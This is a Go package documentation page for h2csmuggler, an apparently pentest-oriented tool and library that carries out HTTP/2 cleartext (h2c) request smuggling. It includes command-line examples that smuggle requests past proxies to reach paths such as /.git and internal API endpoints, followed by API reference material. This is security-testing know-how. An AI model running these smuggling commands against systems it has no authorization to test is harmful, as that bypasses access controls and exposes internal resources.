h2csmuggler

package module

v0.2.0 Latest Latest Go to latest Published: Mar 23, 2021 License: AGPL-3.0 Imports: 12 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/assetnote/h2csmuggler

Links

Open Source Insights

README ¶

h2cSmuggler

Tl;dr

this repo implements h2csmuggler from https://github.com/BishopFox/h2csmuggler in golang.

this repo also implements a golang library for performing h2c smuggling. This was done via forking the net/http2 library and modifying the client to accept and process non-spec compliant h2c upgrades over tls connections. This can also handle h2c upgrades over http.

Two utilities have been added to assist testing:

# check will return whether a h2c connection can be formed and the first request will return
go run ./cmd/h2csmuggler check https://google.com/ http://localhost

# smuggle will attempt the cli arguments as URLs sequentially
go run ./cmd/h2csmuggler smuggle https://google.com/ https://google.com/flag

# demo will create a http server that accepts non-complaint `Connection: Upgrade` connections and upgrade them to h2c for testing
go run ./cmd/demo

$ cat ~/tools/lists/rafter.txt | head -n 10 | ./h2cs mutate pitchfork http://localhost - -p api | ./h2cs smuggle http://localhost - -ojson
{"body":38,"level":"info","msg":"success","status":200,"target":"http://localhost/javsacript/main.js","time":"2020-09-16T12:43:05+10:00"}
{"body":39,"level":"info","msg":"success","status":200,"target":"http://localhost/javascripts/main.js","time":"2020-09-16T12:43:05+10:00"}
{"body":24,"level":"info","msg":"success","status":200,"target":"http://localhost/.git","time":"2020-09-16T12:43:05+10:00"}
{"body":28,"level":"info","msg":"success","status":200,"target":"http://localhost/api/_rpc","time":"2020-09-16T12:43:05+10:00"}
{"body":34,"level":"info","msg":"success","status":200,"target":"http://localhost/api/csrf-token","time":"2020-09-16T12:43:05+10:00"}
{"body":27,"level":"info","msg":"success","status":200,"target":"http://localhost/cgi-bin","time":"2020-09-16T12:43:05+10:00"}
<snip>

Author

Twitter: @seanyeoh

GitHub: minight

Original Research

Jake Miller - https://github.com/BishopFox/h2csmuggler

Documentation ¶

Index ¶

Variables
func CreateConn(t *url.URL, dialer *net.Dialer) (ret net.Conn, err error)
type Conn
- func NewConn(target string, opts ...ConnectionOption) (*Conn, error)
type ConnectionOption
type UpgradeOption
type UpgradeOptions

Constants ¶

This section is empty.

Variables ¶

View Source

var (
	DefaultDialer = &net.Dialer{
		Timeout: time.Millisecond * time.Duration(5000),
		Resolver: &net.Resolver{
			PreferGo: true,
			Dial: func(ctx context.Context, network, address string) (net.Conn, error) {
				d := net.Dialer{
					Timeout: time.Millisecond * time.Duration(5000),
				}
				return d.DialContext(ctx, "udp", "1.1.1.1:53")
			},
		},
	}
	DefaultTransport = &http2.Transport{
		AllowHTTP: true,
	}
)

View Source

var (
	DefaultConnectionHeader    = "Upgrade, HTTP2-Settings"
	DefaultUpgradeHeader       = "h2c"
	DefaultHTTP2SettingsHeader = "AAMAAABkAARAAAAAAAIAAAAA"
)

View Source

var (
	ErrUnexpectedScheme = errors.New("Unexpected scheme for connection")
)

Functions ¶

func CreateConn ¶

func CreateConn(t *url.URL, dialer *net.Dialer) (ret net.Conn, err error)

CreateConn will create a net.Conn from the URL. This will choose between a tls and a normal tcp connection based on the url scheme

Types ¶

type Conn ¶

type Conn struct {
	// contains filtered or unexported fields
}

Conn encapsulates all the state needed to perform a request over h2c. Internally, this is a singlethreaded connection. Functions can be called concurrently, however they will block on the same thread. For concurrent connections, multiple Conns should be instantiated Initialization of the connection is lazily performed to allow for the caller to customise the request used to upgrade the connection Instantiating a Conn should be done via Client

func NewConn ¶

func NewConn(target string, opts ...ConnectionOption) (*Conn, error)

NewConn will return an unitialized h2csmuggler connection. The first will Do will initialize the connection and perform the upgrade. Target must be a parsable url including protocol e.g. https://google.com path and port will be inferred if not provided (443:https and 80:http) Initialization of the connection is lazily performed to allow for the caller to customise the request used to upgrade the connection

func (*Conn) Close ¶

func (c *Conn) Close()

Close will close the underlying connections. After this is called, the struct is no longer safe to use

func (*Conn) Do ¶

func (c *Conn) Do(req *http.Request) (*http.Response, error)

func (*Conn) DoUpgrade ¶

func (c *Conn) DoUpgrade(req *http.Request, opts ...UpgradeOption) (*http.Response, error)

DoUpgrade will perform the request and upgrade the connection to http2 h2c. DoUpgrade can only be successfully called once. If called a second time, this will raise an error If unsuccessfully called, it can be called again, however its likely the same connection error will be returned (e.g. timeout, HTTP2 not supported etc...) The provided request will have the following headers added to ensure the upgrade occurs. Upgrade: h2c HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA Connection: Upgrade These can be modified with the upgrade options however this may result in an unsuccessful connection TODO: make this threadsafe.

func (*Conn) Initialized ¶

func (c *Conn) Initialized() bool

Initialized will return whether this connection has been initialized already

type ConnectionOption ¶

type ConnectionOption func(c *Conn)

func ConnectionDialer ¶

func ConnectionDialer(t *net.Dialer) ConnectionOption

func ConnectionMaxRetries ¶

func ConnectionMaxRetries(v int) ConnectionOption

func ConnectionTransport ¶

func ConnectionTransport(t *http2.Transport) ConnectionOption

type UpgradeOption ¶

type UpgradeOption func(o *UpgradeOptions)

UpgradeOption provides manipulation of the initial upgrade request

func DisableConnectionHeader ¶

func DisableConnectionHeader(val bool) UpgradeOption

func DisableHTTP2SettingsHeader ¶

func DisableHTTP2SettingsHeader(val bool) UpgradeOption

func DisableUpgradeHeader ¶

func DisableUpgradeHeader(val bool) UpgradeOption

func SetConnectionHeader ¶

func SetConnectionHeader(val string) UpgradeOption

func SetHTTP2SettingsHeader ¶

func SetHTTP2SettingsHeader(val string) UpgradeOption

func SetUpgradeHeader ¶

func SetUpgradeHeader(val string) UpgradeOption

type UpgradeOptions ¶

type UpgradeOptions struct {
	ConnectionHeader    string
	HTTP2SettingsHeader string
	UpgradeHeader       string

	ConnectionHeaderDisabled    bool
	HTTP2SettingsHeaderDisabled bool
	UpgradeHeaderDisabled       bool
}

UpgradeOptions provide manual overrides for the specific headers needed to upgrade the connection to h2c. Fiddling with these may result in an unsuccessful connection

Source Files ¶

View all Source files

client.go

Directories ¶

Path	Synopsis
cmd
demo
h2csmuggler
h2csmuggler/cmd
http2 Package http2 implements the HTTP/2 protocol.	Package http2 implements the HTTP/2 protocol.
h2c Package h2c implements the unencrypted "h2c" form of HTTP/2.	Package h2c implements the unencrypted "h2c" form of HTTP/2.
h2i The h2i command is an interactive HTTP/2 console.	The h2i command is an interactive HTTP/2 console.
hpack Package hpack implements HPACK, a compression format for efficiently representing HTTP header fields in the context of HTTP/2.	Package hpack implements HPACK, a compression format for efficiently representing HTTP header fields in the context of HTTP/2.
pkg
parallel
paths

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL